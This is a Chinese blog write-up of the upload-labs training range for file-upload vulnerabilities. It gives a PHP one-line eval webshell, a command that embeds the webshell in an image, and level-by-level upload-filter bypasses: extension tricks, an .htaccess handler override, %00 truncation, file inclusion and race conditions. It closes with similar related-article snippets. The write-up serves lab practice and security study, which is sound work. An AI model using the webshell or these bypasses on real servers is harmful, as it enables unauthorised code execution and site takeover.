文件上传之upload_labs通关笔记

最新推荐文章于 2025-05-07 19:40:48 发布
最新推荐文章于 2025-05-07 19:40:48 发布
阅读量456 收藏 2
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/104307511
本文详细介绍了在渗透测试中绕过各种安全防护措施的方法,包括利用图片木马、文件上传漏洞及多重后缀名等技巧,同时提供了十六进制编辑工具的使用方法,帮助读者深入理解并实践安全测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境搭建

项目地址:https://github.com/c0ny1/upload-labs/releases

类型分类

在这里插入图片描述

通关记录

php一句话木马<?php eval($_POST['cmd'])?>
cmd命令行构造一句话图片木马指令

copy xx.jpg/b + xx.php/a new.jpg
xx.jpg 正常图片
xx.php 一句话木马文件,首行要先空格再构写一句话木马

16进制编辑工具:010Editor6.0
1.js前端验证,burp抓包修改后缀绕过
2. MIME验证,同上
在这里插入图片描述
3. php345绕过,抓包修改后缀名为php3
4. 上传.htaccess文件后再上传图片木马
构造:SetHandler application/x-httpd-php
不管什么后缀都会被当做php文件解析
注意:文件名必须为.htaccess文件
在这里插入图片描述
5. 大小写绕过
6. 空格绕过,抓包在后缀名后添加空格
7. 点绕过,在后缀名后面加点
8. ::$DATA绕过,也是加在后缀名后
9. 构造php. .(点+空格+点)进行绕过
10. 双重后缀名绕过,构造pphphp进行绕过
11. get类型%00截断,上传一个木马文件xx.jpg,使用%00截断
在这里插入图片描述
12. post类型%00截断,但需对%00进行解码(decode)
在这里插入图片描述

13–15 上传图片木马,利用文件包含漏洞调用图片进行绕过
利用文件包含漏洞访问上传文件:http://10.10.10.139/include.php?file=http://10.10.10.139/upload/9920200214144230.png
16. 二次渲染过滤,即图片内容部分被打乱重组,可使用十六进制编辑工具编辑图片插入恶意脚本,需插入没被打乱的部分
在这里插入图片描述
17-18.条件竞争绕过,重放发包
19.保存路径POST%00截断

upload-labs 通关笔记
box
04-12 1034
Pass-01(前端绕过) 直接上传 php文件发现 只允许上传图片,是被前端 js过滤的。对于前端防护,有多种方式 可以绕过 将test.php文件重命名为test.php.jpg,使用burp抓包将图片后缀改回php文件后缀 将HTML源码保存到本地,删除JS部分 浏览器禁用JS Pass-02(MIEM校验绕过) 源码: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPL
Upload-labs 1-21关 靶场通关笔记(含代码审计)
m0_59598029的博客
02-25 4166
basename— 返回路径中的文件名部分给出一个包含有指向一个文件的全路径的字符串,本函数返回基本的文件名。Notebasename()纯粹基于输入字符串操作, 它不会受实际文件系统和类似 “..” 的路径格式影响。php?1) sudoers3) passwd4) etc5) .6)imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像。
upload-labs通关笔记
jhfjdf的博客
09-09 601
upload-labs通关笔记upload-labs靶场pass1 禁用js绕过pass2 content-type绕过pass3 黑名单绕过pass4 .htaccess绕过pass5 点+空格+点绕过pass6 大小写绕过pass7 空格绕过pass8 点绕过pass9 ::$DATA绕过 upload-labs靶场 pass1 禁用js绕过 我们先在桌面创建一个php文件,内容为 然后将该文件上传pass1 我们右键查看源代码 发现存在js代码在限制文件上传类型 那就在浏览器禁用js 我用
upload-labs靶场通关详解:第1关 前端验证
CL1799438883的博客
05-07 528
phpinfo() 是 PHP 里的一个内置函数,其功能是输出关于当前 PHP 环境的详细信息。原理:上传的文件通过前端验证后,会将其发送给后端,在发送给后端的过程中将文件后缀改为php,这样上传到后端服务器中的文件就是php文件。首先将一句话木马改为png、jpg等格式,使其通过前端验证,然后在数据包中将文件名改回php后缀,放行数据包,上传成功。通过代码可以发现,文件上传验证是写在js中,也就是最简单的前端验证。新建一个文本文档,写入php代码,修改文件后缀名为php,保存。
upload-labs通关
weixin_74485208的博客
10-15 2664
upload-labs通关
文件上传upload-labs-docker通关
shdbehdvd的博客
11-26 2430
文件上传基础 阶段一
文件上传漏洞之upload-labs打靶笔记
m0_60716947的博客
05-07 1586
(一)文件上传漏洞 (1)文件上传漏洞的定义 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 (2)webshell 的定义 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或
upload-labs通关(第14-第15关)
qq_73985955的博客
08-04 1172
首先我们创建一个1.php文件,在里面写入我们的一句话木马,记住要在代码的前面敲两个空格或者其他两个符号都可以,然后使用010editor打开这个文件,将两个空格处变成jpg的文件头(gif和png的也可以啊,不一定是jpg的),如果具体不知道怎么操作,可以看这位大佬的。查看源码发现,这个代码只对上传的文件的头两个字节进行检验,检查是否是jpg、gif或者是png图片。这个命令必须把xx.jpg放在前面,否则后面生成的xxx.jpg文件还是会被代码识别到,从而过滤。,我也是根据这位大佬的思路才做出了的。
upload-labs 通关
cgygsw的博客
11-26 1459
1.这里的关键点就是htaccess文件,把所有的目录下的文件的解析方式都修改成了php。2.所以我们第二次上传的图片为2.png “png”不在黑名单中,但是htaccess文件又把他解析成了php的格式,所以可以正常的解析。
upload-labs通关手册
12-03
详细记录了upload-labs靶场的通关步骤,并且附带有caidao和burpsuite工具资源,非常适合初学者!!!
Upload-labs通关手册.pdf
08-06
Upload-labs通关手册
upload-labs通关笔记(上)
qq_51637038的博客
03-15 225
htaccess文件是apache独有的配置文件(.htaccess文件没有名字,只有后缀名),可以实现网页重定向、404错误页面自定义、允许/阻止特定的用户或者目录的访问、改变扩展名等功能,如果能够将.htaccess文件上传至服务器,.htaccess文件可以指定目录下某类文件被当做另一类文件解析。可知本题检查了$_FILES['file']['type']即文件的MIME类型,当文件上传请求发送时网页会将MIME类型写入http头中的content-type项,因此用bp抓包后修改即可。
upload _labs 通关
gclome的博客
07-08 584
第11关 源码如下: 现在上传一张图片,并用burp suite抓包,然后send to repeater,使用00截断 00截断条件: 1.php<5.3.4,5.3.4及以上已修复。 2.magic_quotes_gpc off。 我们可以在右边看见上传成功 访问地址,上传成功 第12关 源码如下: 现在上传一张图片,并用burp suite抓包,然后send to repeater ...
Upload-labs通关
LYJ20010728的博客
05-08 791
Upload-labs通关第一关第二关 第一关 源码; function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg
Upload-Labs通关
m0_64180167的博客
07-26 1218
首先 很简单文件上传就是 需要用户进行上传文件 图片或视频等信息但是如果用户恶意上传木马怎么办?这里由提到了木马。
upload_labs
最新发布
07-15
在实验室环境中上传文件或数据通常涉及多个步骤和工具,具体取决于实验室的管理系统、使用的平台以及数据的类型。以下是一些常见的上传方法和注意事项: ### 文件上传的基本流程 1. **本地文件准备**:确保文件格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值